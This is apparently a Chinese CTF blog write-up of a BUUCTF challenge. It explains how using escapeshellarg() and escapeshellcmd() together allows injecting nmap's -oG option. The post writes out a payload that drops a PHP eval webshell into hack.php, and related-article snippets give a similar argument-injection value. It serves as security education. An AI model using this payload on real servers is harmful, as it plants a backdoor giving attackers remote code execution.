一天一道ctf 第20天(escapeshellarg和escapeshellcmd)

最新推荐文章于 2023-12-14 10:28:47 发布
最新推荐文章于 2023-12-14 10:28:47 发布
阅读量812 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/scrawman/article/details/115448702
版权

[强网杯 2019]高明的黑客
在这里插入图片描述
作者直接告诉我们源码备份在www.tar.gz,这样就不用扫网站目录了,省了不少时间。
在这里插入图片描述
靠当我没有说,这里面几千个文件,怪不得43M。那人工代码审计是不可能的了,只能靠跑脚本。这里观摩了一下网上大神写的脚本:
https://blog.csdn.net/a3320315/article/details/102945940
主要是看一下脚本的思路,等以后有能力了再做一遍。

[BUUCTF 2018]Online Tool
在这里插入图片描述
这里的知识点是escapeshellarg()和escapeshellcmd() 两个函数
https://paper.seebug.org/164/
这篇文章讲的很详细了我就不复述了

利用这个漏洞的地方就在下面的system(“namp…”)里,system函数在命令行里执行nmap命令。nmap是一个扫描工具,可以添加参数-oG实现将命令和结果写到文件。
那么payload就是这个一句话木马

?host=' <?php @eval($_POST["hack"]);?> -oG hack.php '

经过两个函数的转义host='\\' \<\?php @eval($_POST["hack"])\;\?\> -oG hack.php \\'' 中间的'\'可以不看,主要是两边的'\\'\\''。前面的\\被解释成\而不是转义字符,所以我们得以将中间的一句话木马和nmap的结果一起写到hack.php文件中
在这里插入图片描述
好心的作者还返回了文件名让我们用蚁剑连接,得到flag

http://98cff786-c429-4d23-a6c1-8268bb9a020b.node3.buuoj.cn/03f35087304b172a9af23833864e6797/hack.php

在这里插入图片描述
在hack.php里可以看到我们写入的一句话木马和nmap扫描的结果
在这里插入图片描述
不过这个漏洞好像已经被修复了,我用php8.0重写代码//^代替了
在这里插入图片描述

scrawman
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF 2018 Online Tool(escapeshellargescapeshellcmd
weixin_45577185的博客
07-24 164
答案博客 参考博客 百度来了一篇文章: https://paper.seebug.org/164/ 这两个函数按代码里那样的顺序使用,是会产生漏洞的,如果是反过来就不会。 escapeshellargescapeshellarg() 将给字符串增加一个 单引号 并且能引用或者转码任何已经存在的单引号,这样以确保能够直接将一个字符串传入 shell 命令执行函数,并且还是确保安全的。shell 命令执行函数包含 exec(), system() 执行运算符 (反引号)。 escapeshellcmd: e
CTF技能树,为初学者的一个认识ctf
10-22
ctf的一个树状图而已
浅谈CTFescapeshellarg的利用
读万卷书,行万里路。
08-09 5341
浅谈 escapeshellarg 的利用 文章目录浅谈 escapeshellarg 的利用0 前言1 参数注入2 逃逸字符2.1 cat flag2.2 freepoint3 总结 0 前言 escapeshellarg 的作用是把字符串转码为可以在 shell 命令里使用的参数。(escapeshellargescapeshellcmd 相似,主要看是否有引号) 在 CTF 可能被用于: 参数注入(开发人员错误的使用 escapeshellarg 函数) 逃逸字符(该函数非二进制安全) 1
PHP escapeshellarg()+escapeshellcmd()绕过
rev1ve的博客
12-08 2631
这样的流程来处理输入是存在隐患的,mail就是个很好的例子,因为它函数内部使用了escapeshellcmd,如果开发人员仅用escapeshellarg来处理输入再传给mail那这层防御几乎是可以忽略的。如果可以注入参数,那利用就是各种各样的了,例如 PHPMailer 和 RoundCube 中的mail和 Naigos Core 中的 curl都是很好的参数注入的例子。当进行escapeshellarg()函数处理后,会先进行字符转义,变成如下。那么我们在传入参数的前面添加单引号,后面空格加单引号。
day5-escapeshellargescapeshellcmd使用不当
qq_45951598的博客
01-09 2299
文章目录Day 5 - postcardescapeshellcmd()函数escapeshellarg()函数小案列总结: Day 5 - postcard escapeshellcmd()函数 escapeshellarg()函数 escapeshellarg — 把字符串转码为可以在 shell 命令里使用的参数 小案列 可见两个函数配合使用就会导致多个参数的注入。 1、传入的参数是:172.17.0.2’ -v -d a=1 2、经过escapeshellarg处理后变成了’172.17.
escapeshellarg()只是用来转义shell命令的部分参数
weixin_30739595的博客
03-22 524
escapeshellarg()的说明是这里 原来以为这个函数可以用来把一整条shell命令转义像这样: $sh = 'mysql -uroot -proot -Dtest < /var/www/test.com/sql/user (1).sql'; shell_exec(escapeshellarg($sh)); 一试就出错了。。。。 仔细看了...
CTF题目 [成绩查询 - Bugku CTF]union注入和sqlmap的入门使用,两种方法一道
最新发布
07-16
### CTF题目 [成绩查询 - Bugku CTF]union注入和sqlmap的入门使用 #### 知识点一:SQL注入基础与Union注入原理 **SQL注入**是一种常见的网络安全攻击方式,通过将恶意SQL代码插入应用程序接收的数据中,进而操纵...
CTF之常见密码学攻击手法和实现.md
10-24
CTF-crypto-入门-密码学
ctf汇总(逆向、杂项和加解密).rar
12-19
ctf汇总(逆向、杂项和加解密) ctf汇总(逆向、杂项和加解密) ctf汇总(逆向、杂项和加解密) ctf汇总(逆向、杂项和加解密) ctf汇总(逆向、杂项和加解密) ctf汇总(逆向、杂项和加解密) ctf汇总(逆向、杂项...
CTF从入门到提升(一).docx
12-18
CTF从入门到提升(一) CTF(Capture The Flag)是一种网络安全竞赛的形式,起源于西方传统运动,两军互相争夺旗帜,夺取敌军旗帜代表战败。在信息安全领域,CTF是通过各种攻击手法,获取服务器后寻找指定的字段,...
escapeshellarg escapeshellcmd漏洞
a3320315的博客
01-31 1399
[BUUCTF 2018]Online [BUUCTF 2018]Online 谈escapeshellarg绕过与参数注入漏洞 命令参数注入
PHP 中命令行调用 escapeshellarg 函数中文问题
ModStartCMS的博客
01-09 281
这是因为 escapeshellarg 函数默认使用的是 ASCII 字符集,对于非 ASCII 字符,它会将其视为无效字符,并将其过滤掉。在这个例子中,$input 是一个用户输入的字符串,你可以使用 escapeshellarg 将它转义为安全的 shell 参数。escapeshellargPHP 中的一个函数,它可以将字符串转义为安全的 shell 参数。在 PHP 中,你可以使用 escapeshellarg 函数来保证传递给 shell 命令的参数是安全的。这样可以避免命令注入攻击。
escapeshellargescapeshellcmd 绕过之[BUUCTF 2018]Online Tool
qq_58970968的博客
07-09 1327
知识点:escapeshellargescapeshellcmd 绕过nmap -oG 参数,将结果和命令写入到文件详细:参考谈谈escapeshellarg参数绕过和注入的问题escapeshellarg — 把字符串转码为可以在 shell 命令里使用的参数功能 :escapeshellarg() 将给字符串增加一个单引号并且能引用或者转码任何已经存在的单引号,这样以确保能够直接将一个字符串传入 shell 函数,shell 函数包含 exec(), system() 执行运算符(反引号)我的理解
escapeshellarg参数绕过和注入的问题
m0_75178803的博客
12-14 1424
将给字符串增加一个单引号并且能引用或者转义任何已经存在的单引号,这样以确保能够直接将一个字符串传入 shell 函数,并且还是确保安全的。PHP 将尝试将反引号中的内容作为 shell 命令来执行,并将其输出信息返回。用空格替换了百分号、感叹号(延迟变量替换)和双引号,并在字符串两边加上双引号。在windows系统中,system函数直接在控制台调用一个command命令。参数,命令执行后的返回状态会被写入到此变量。参数, 那么会用命令执行的输出填充此数组。)都会被一个额外的反斜线所转义。
PHP escapeshellarg()+escapeshellcmd() 导致的漏洞
东隅的博客
09-12 770
PHP escapeshellarg()+escapeshellcmd() 导致的漏洞
escapeshellargescapeshellcmd使用不当
qq_37466661的博客
08-20 248
php代码审计 escapeshellargescapeshellcmd使用不当
BUUCTF 2018 Online Tool(escapeshellargescapeshellcmd使用不当导致rce)
qq_45521281的博客
05-20 1164
参考: 谈谈escapeshellarg参数绕过和注入的问题 PHP escapeshellarg()和escapeshellcmd()并用之殇 谈escapeshellarg绕过与参数注入漏洞 https://blog.csdn.net/qq_26406447/article/details/100711933 进入题目显示php源码: 这里用到escapeshellarg()、escapeshellcmd()两个函数: escapeshellargescapeshellarg() 将给字符串增加一
2021-08-14BUUCTF 2018]Online Tool(escapeshellarg+escapeshellcmd函数连用导致rce、nmap -oG写shell转)
qq_45290991的博客
08-14 378
本文转自大佬K0f1i先吐槽一下,搜到了漏洞也不会利用,会利用了看到这题也不知道getflag,????,砸挖鲁多,食我压路机啊!! 题目给了源码 <?php if (isset(KaTeX parse error: Double subscript at position 110: …string">'HTTP_X_̲FOR...
phpescapeshellarg 中文被过滤
ricky1217的专栏
11-04 3863
同样的代码,发现通过 localhost/index.php 访问,和在 shell 中通过 php ./index.php 运行結果却不一样。 在程序中需要通过 shell_exec 来执行一个 linux 程序,而它的输入来自 echo ,即: shell_exec('echo '.escapeshellarg($str).' | some_cmd 2>&1'); 而这个 $
一道CTF题,要求输入邮箱和密码,但是没有回显
06-10
盲注攻击是一种利用应用程序的响应时间或错误消息来推断信息的攻击方式。 对于这道题,你可以尝试使用盲注攻击来尝试猜测正确的邮箱和密码。你可以尝试以下方法: 1. 尝试使用一些简单的密码,如“password”、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值